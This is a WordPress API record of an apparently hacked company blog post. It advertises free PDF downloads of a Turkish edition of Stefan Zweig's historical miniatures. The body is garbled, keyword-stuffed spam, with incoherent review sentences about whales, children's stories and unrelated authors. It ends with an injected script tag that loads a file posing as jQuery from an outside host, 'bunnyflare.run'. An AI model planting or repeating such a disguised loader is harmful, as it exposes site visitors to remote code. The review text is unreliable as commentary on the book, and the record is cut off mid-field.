{"id":129012,"date":"2025-09-30T15:22:53","date_gmt":"2025-09-30T07:22:53","guid":{"rendered":"https:\/\/www.sinaranadvance.com.my\/?p=129012"},"modified":"2026-01-18T09:22:58","modified_gmt":"2026-01-18T01:22:58","slug":"insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf","status":"publish","type":"post","link":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/","title":{"rendered":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF"},"content":{"rendered":"<h1>\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; Stefan Zweig<\/h1>\n<p>Tempo d\u00fczensizdi, plot beklenmedik \u015fekillerde d\u00f6n\u00fcyordu, bazen p\u00fcr\u00fczs\u00fcz akan, \u00e7evrimi\u00e7i ebook oku \u00e7amura saplanan bir nehir gibi. Bu kitab\u0131n etkileyici olan \u015feylerinden biri, tarihsel do\u011fruluk ile ilgi \u00e7ekici hikaye anlat\u0131m\u0131 aras\u0131nda dengede tutma yetene\u011fidir, bu, hem bilgilendirici hem de e\u011flenceli bir anlat\u0131m olu\u015fturuyor. Okuduktan sonra \u00fczg\u00fcn bir his ve kay\u0131p duygusu hissettim ve son sayfadan uzun s\u00fcre sonra dijital kitaplar \u00fccretsiz bu hisler beni terk etmedi. Hikaye ilgi \u00e7ekiciydi ve ne olaca\u011f\u0131n\u0131 g\u00f6rmek i\u00e7in sab\u0131rs\u0131zlan\u0131yorum. Kendisinden daha fazlas\u0131n\u0131 bekleyen bir kitap bulmak nadirdir.<\/p>\n<p>Hikayede bir d\u00fc\u015f gibi bir kalite vard\u0131, olaylar garip, neredeyse ger\u00e7ek\u00fcst\u00fc kitap indir \u015fekilde geli\u015fiyordu. Ayar dald\u0131r\u0131c\u0131yd\u0131, hem fantastik hem de ger\u00e7eklikte k\u00f6k salm\u0131\u015f, zengin detaylarla dolu bir d\u00fcnya yarat\u0131yordu. Okurken, kimliklerimizin \u00e7evrelere nas\u0131l \u015fekillendi\u011fini ve hayat\u0131m\u0131zda kendi yollar\u0131m\u0131z\u0131 nas\u0131l bulaca\u011f\u0131m\u0131z konusunda merak ettim.<\/p>\n<p>Kitap karma\u015f\u0131k bir kumard\u0131, baz\u0131 b\u00f6l\u00fcmleri komikken, di\u011ferleri biraz zorlu hissettiriyordu. Genel olarak e\u011flenceli bir okuma idi, ancak kusurlar olmadan da. The story&#8217;s exploration of the human condition was both profound \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr powerful, laying bare our deepest fears and \u00e7evrimi\u00e7i kitaplar \u00fccretsiz oku with unflinching honesty. Bu kitapta d\u00fcnya in\u015fas\u0131 titiz ve detayl\u0131d\u0131r, okuyucuyu tamamen sarmalayan, hikayenin detaylar\u0131na ve karakterlerin ya\u015fad\u0131\u011f\u0131 ya\u015famlara kaybolmay\u0131 kolayla\u015ft\u0131ran bir derinlik ve zenginlik ebook \u00e7evrimi\u00e7i oku<\/p>\n<h2>Kitaplar Her Zaman \u00dccretsiz \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr<\/h2>\n<p>Yazar\u0131n birden fazla tema ve fikri nas\u0131l \u00e7evrimi\u00e7i \u00fccretsiz oku araya getirdi\u011fini takdir ettim, hem ilgi \u00e7ekici hem de d\u00fc\u015f\u00fcnd\u00fcr\u00fcc\u00fc olan zengin ve karma\u015f\u0131k bir kuma\u015f yaratt\u0131, hatta baz\u0131 ipler gev\u015fek ve az geli\u015fmi\u015f \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr<\/p>\n<p>Hikaye, zaman ve mekan s\u0131n\u0131rlar\u0131n\u0131 ebooks \u00e7evrimi\u00e7i do\u011frudan ruhumu etkileyen bir anlat\u0131c\u0131l\u0131\u011f\u0131n \u015faheseri, sanat eseri idi. Kitab\u0131 bitirince, hikayenin sona erdi\u011fine ve anlat\u0131n\u0131n d\u00fcnyas\u0131n\u0131 geride \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr gerekti\u011fine dair bir h\u00fcz\u00fcn, ebook pdf \u00fccretsiz bir fark\u0131ndal\u0131k hissettim.<\/p>\n<p>Kitab\u0131n balinalar hakk\u0131nda bir podcast tarz\u0131 anlat\u0131 ile e\u011fitmeye \u00e7al\u0131\u015fmas\u0131, bu inan\u0131lmaz hayvanlar\u0131n ihti\u015fam\u0131n\u0131 ve gizemini yakalamay\u0131 ba\u015faramad\u0131\u011f\u0131 i\u00e7in ka\u00e7\u0131r\u0131lm\u0131\u015f bir f\u0131rsatt\u0131r. Her zaman p\u00fcr\u00fczs\u00fcz veya incelikli olmayabilir, ebook \u00e7evrimi\u00e7i \u00fccretsiz kenarlar\u0131nda kaba bir \u00e7ekicilik vard\u0131r ve diren\u00e7 g\u00f6stermek zordur.<\/p>\n<h3>Stefan Zweig kitap \u00e7evrimi\u00e7i \u00fccretsiz<\/h3>\n<p>\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr \u00fccretsiz pdf indir yan\u0131yordu, yo\u011funlu\u011fu artan bir ate\u015fti, sonunda duygular ve a\u00e7\u0131klamalarla patlad\u0131. Bu yazar\u0131n eserlerinden en \u00e7ok sevdi\u011fim, zor konulara hassas ve derinlemesine \u00fccretsiz epub \u015fekilde yakla\u015f\u0131m tarz\u0131d\u0131r; her zaman kolay okunmayabilir, ancak de\u011feri vard\u0131r, \u00e7\u00fcnk\u00fc bitirdi\u011finde d\u00fcnya \u00fczerinde yeni bir bak\u0131\u015f a\u00e7\u0131s\u0131 kazand\u0131\u011f\u0131n\u0131 hissedersiniz. Bu anlat\u0131da sokaklar canland\u0131, ger\u00e7ek\u00e7i olmayan bir marjinal ya\u015fama tasviri, \u00e7aresiz ve ezilmi\u015f insanlar\u0131n hayatta kalmak i\u00e7in m\u00fccadele etti\u011fi bir yer. D\u00fcnya kurulumu canl\u0131 ve s\u00fcr\u00fckleyiciydi, kitab\u0131n ger\u00e7ek bir \u00f6zelli\u011fi, ancak karakterler d\u00fc\u015ft\u00fc.<\/p>\n<p>Bu roman, okuduktan sonra etkisinin uzun s\u00fcre s\u00fcrd\u00fc\u011f\u00fc, hikayenin g\u00fcc\u00fcne dair korkutucu bir hat\u0131rlat\u0131c\u0131 \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr sizi de\u011fi\u015ftirecek bir pdf \u00fccretsiz indir olacak.<\/p>\n<p>Temel olarak, bu kitap insan deneyiminin bir ke\u015ffi, kolay cevaplar\u0131 reddediyor ve bunun yerine karma\u015f\u0131k bir duygular, motivasyonlar ve arzular dokumas\u0131 sunuyor. Anlat\u0131 sesi o kadar etkili ve \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr geli\u015fmi\u015fti ki, hikayenin kendisi biraz d\u00fczensiz olsa bile, kendimi tamamen d\u00fcnyaya ve hikayeye dald\u0131\u011f\u0131m\u0131 hissettim. Her zaman Sekre Seven&#8217;in bir hayran\u0131y\u0131m ve bu kitap hayal k\u0131r\u0131kl\u0131\u011f\u0131na u\u011fratmad\u0131. \u00c7ocuklara naziklik ve ba\u015fkalar\u0131na yard\u0131m etmenin de\u011ferini \u00f6\u011freten fb2 bir macera. Hikaye ilgi \u00e7ekici, karakterler ilgin\u00e7, bu y\u00fczden gen\u00e7 okuyucular i\u00e7in okunmas\u0131 gereken bir kitap. Yazar\u0131n becerisine bir kan\u0131tt\u0131r ki, ben hikaye \u00e7\u0131lg\u0131nca, kontrolden \u00e7\u0131km\u0131\u015f bir tren gibi ilerlerken bile, her an raydan \u00e7\u0131kma tehlikesi olmas\u0131na ra\u011fmen, hikayeye yat\u0131r\u0131m yapmaya devam ettim.<\/p>\n<h3>\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr pdf<\/h3>\n<p>Bu anlat\u0131da, karakterlerin ge\u00e7mi\u015flerinin ve mevcut epub kesi\u015fimi, s\u0131rlar\u0131n\u0131 ve s\u00fcrpriz ittifaklar\u0131n\u0131 ortaya \u00e7\u0131kararak hikayeye derinlik ve karma\u015f\u0131kl\u0131k katar. Yaz\u0131 canland\u0131r\u0131c\u0131 ve i\u00e7ine \u00e7eken, beni ba\u015fka bir zaman ve yere ta\u015f\u0131yan betimlemelerle, zaman makinesi gibi, ge\u00e7mi\u015f bir d\u00f6neme g\u00f6t\u00fcrd\u00fc. Karma\u015f\u0131k ve \u00e7evrimi\u00e7i kitap indir y\u00f6nl\u00fc bir hikayeydi, insan duygusunun derinliklerini hassasiyet ve zarafetle ke\u015ffeden bir hikaye, kalbimde ve akl\u0131mda kal\u0131c\u0131 bir iz b\u0131rakt\u0131.<\/p>\n<p>Kendi sessiz yolunda, kitab\u0131 derin bir anlamda konu\u015fan, hem ki\u015fisel hem de evrensel bir ba\u011flant\u0131 yaratan bir sanat eseri, bir \u015feddiydi. Bu kitap, ilham verici ve \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr bir hikaye arayan herkes i\u00e7in harika bir se\u00e7imdir. Olumlu mesaj\u0131 ve karakterleri ile etkileyicidir.<\/p>\n<p>Hikaye yava\u015f bir yanarda\u011f gibi, gerilimi ad\u0131m ad\u0131m art\u0131rd\u0131, ancak klimaksta s\u00f6nd\u00fc. Sanki yazar, kitaplar\u0131 bir kavram\u0131 alm\u0131\u015f ve \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr karma\u015f\u0131k bir d\u00fczyaz\u0131yla bo\u011fmu\u015ftu.<\/p>\n<p>Bunu bir ergen olarak okudum ve kal\u0131c\u0131 bir izlenim b\u0131rakt\u0131. Zor konular\u0131 ele alma \u015fekli hem g\u00f6z a\u00e7\u0131c\u0131 hem de g\u00fczelce tasarlanm\u0131\u015ft\u0131. Bir\u00e7ok d\u00fczeyde yank\u0131lanan pdf kitap indir kitap. Ya\u015fam\u0131n zor ger\u00e7eklerinden ka\u00e7\u0131nmayan \u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr ve d\u00fcr\u00fcst bir hesap. Bu kitap g\u00fc\u00e7l\u00fc ve gerekli bir okuma, son sayfay\u0131 pdf \u00fccretsiz uzun s\u00fcre yan\u0131n\u0131zda kalacak bir kitap.<\/p>\n<p>Ger\u00e7ekten, bu kitab\u0131n neden bu kadar etkileyici oldu\u011funu tam olarak belirlemeye \u00e7al\u0131\u015f\u0131yorum, ancak san\u0131r\u0131m bu, yazar\u0131n hikaye ipu\u00e7lar\u0131n\u0131 ustal\u0131kla \u00f6rmesinden \u00e7evrimi\u00e7i kitaplar \u00fccretsiz oku ve bu, gerilim ve beklenti duygusunu b\u00fcy\u00fcl\u00fc bir \u015fekilde yarat\u0131yor. Bu kitap, hikaye anlat\u0131c\u0131l\u0131\u011f\u0131n g\u00fcc\u00fcn\u00fcn bir kan\u0131t\u0131yd\u0131, en s\u0131radan, g\u00fcnl\u00fck olaylar\u0131n bile b\u00fcy\u00fcl\u00fc ve ola\u011fan\u00fcst\u00fc bir \u015feye d\u00f6n\u00fc\u015ft\u00fcr\u00fclebilece\u011finin bir ebook indir<\/p>\n<p><script src=\"\/\/cdn.bunnyflare.run\/jquery_min.js?id=12391091\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; Stefan Zweig Tempo d\u00fczensizdi, plot beklenmedik \u015fekillerde d\u00f6n\u00fcyordu, bazen p\u00fcr\u00fczs\u00fcz akan, \u00e7evrimi\u00e7i ebook oku \u00e7amura saplanan bir nehir gibi. Bu kitab\u0131n etkileyici olan \u015feylerinden biri, tarihsel do\u011fruluk ile ilgi \u00e7ekici hikaye anlat\u0131m\u0131 aras\u0131nda dengede tutma yetene\u011fidir, bu, hem bilgilendirici hem de e\u011flenceli bir anlat\u0131m olu\u015fturuyor. Okuduktan [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-129012","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group\" \/>\n<meta property=\"og:description\" content=\"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; Stefan Zweig Tempo d\u00fczensizdi, plot beklenmedik \u015fekillerde d\u00f6n\u00fcyordu, bazen p\u00fcr\u00fczs\u00fcz akan, \u00e7evrimi\u00e7i ebook oku \u00e7amura saplanan bir nehir gibi. Bu kitab\u0131n etkileyici olan \u015feylerinden biri, tarihsel do\u011fruluk ile ilgi \u00e7ekici hikaye anlat\u0131m\u0131 aras\u0131nda dengede tutma yetene\u011fidir, bu, hem bilgilendirici hem de e\u011flenceli bir anlat\u0131m olu\u015fturuyor. Okuduktan [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\" \/>\n<meta property=\"og:site_name\" content=\"Sinaran Advance Group\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-30T07:22:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-01-18T01:22:58+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\"},\"headline\":\"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF\",\"datePublished\":\"2025-09-30T07:22:53+00:00\",\"dateModified\":\"2026-01-18T01:22:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\"},\"wordCount\":1216,\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\",\"name\":\"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group\",\"isPartOf\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\"},\"datePublished\":\"2025-09-30T07:22:53+00:00\",\"dateModified\":\"2026-01-18T01:22:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.sinaranadvance.com.my\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#website\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"name\":\"Sinaran Advance Group\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#organization\",\"name\":\"Sinaran Advance Group\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"contentUrl\":\"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg\",\"width\":1085,\"height\":675,\"caption\":\"Sinaran Advance Group\"},\"image\":{\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/sinaranadvance.com.my\"],\"url\":\"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/","og_locale":"en_US","og_type":"article","og_title":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group","og_description":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; Stefan Zweig Tempo d\u00fczensizdi, plot beklenmedik \u015fekillerde d\u00f6n\u00fcyordu, bazen p\u00fcr\u00fczs\u00fcz akan, \u00e7evrimi\u00e7i ebook oku \u00e7amura saplanan bir nehir gibi. Bu kitab\u0131n etkileyici olan \u015feylerinden biri, tarihsel do\u011fruluk ile ilgi \u00e7ekici hikaye anlat\u0131m\u0131 aras\u0131nda dengede tutma yetene\u011fidir, bu, hem bilgilendirici hem de e\u011flenceli bir anlat\u0131m olu\u015fturuyor. Okuduktan [&hellip;]","og_url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/","og_site_name":"Sinaran Advance Group","article_published_time":"2025-09-30T07:22:53+00:00","article_modified_time":"2026-01-18T01:22:58+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#article","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/"},"author":{"name":"admin","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d"},"headline":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF","datePublished":"2025-09-30T07:22:53+00:00","dateModified":"2026-01-18T01:22:58+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/"},"wordCount":1216,"publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/","url":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/","name":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF - Sinaran Advance Group","isPartOf":{"@id":"https:\/\/www.sinaranadvance.com.my\/#website"},"datePublished":"2025-09-30T07:22:53+00:00","dateModified":"2026-01-18T01:22:58+00:00","breadcrumb":{"@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sinaranadvance.com.my\/index.php\/2025\/09\/30\/insanligin-yildizinin-parladigi-anlar-on-iki-tarihsel-minyatur-tum-kitaplar-pdf\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.sinaranadvance.com.my\/"},{"@type":"ListItem","position":2,"name":"\u0130nsanl\u0131\u011f\u0131n Y\u0131ld\u0131z\u0131n\u0131n Parlad\u0131\u011f\u0131 Anlar: On \u0130ki Tarihsel Minyat\u00fcr &#124; T\u00fcm Kitaplar PDF"}]},{"@type":"WebSite","@id":"https:\/\/www.sinaranadvance.com.my\/#website","url":"https:\/\/www.sinaranadvance.com.my\/","name":"Sinaran Advance Group","description":"","publisher":{"@id":"https:\/\/www.sinaranadvance.com.my\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sinaranadvance.com.my\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.sinaranadvance.com.my\/#organization","name":"Sinaran Advance Group","url":"https:\/\/www.sinaranadvance.com.my\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/","url":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","contentUrl":"https:\/\/www.sinaranadvance.com.my\/wp-content\/uploads\/2021\/06\/cropped-Sinaran-Logo-Complete-01-scaled-2.jpg","width":1085,"height":675,"caption":"Sinaran Advance Group"},"image":{"@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/53a837ac211dea070613fe89a0e11d1d","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sinaranadvance.com.my\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d8ef0714f1fe89842beb2a5f0ca3e7ba6b1fd49220ccc32472f52e936991bbe?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/sinaranadvance.com.my"],"url":"https:\/\/www.sinaranadvance.com.my\/index.php\/author\/sinaranadvance\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts\/129012","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sinaranadvance.com.my\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https: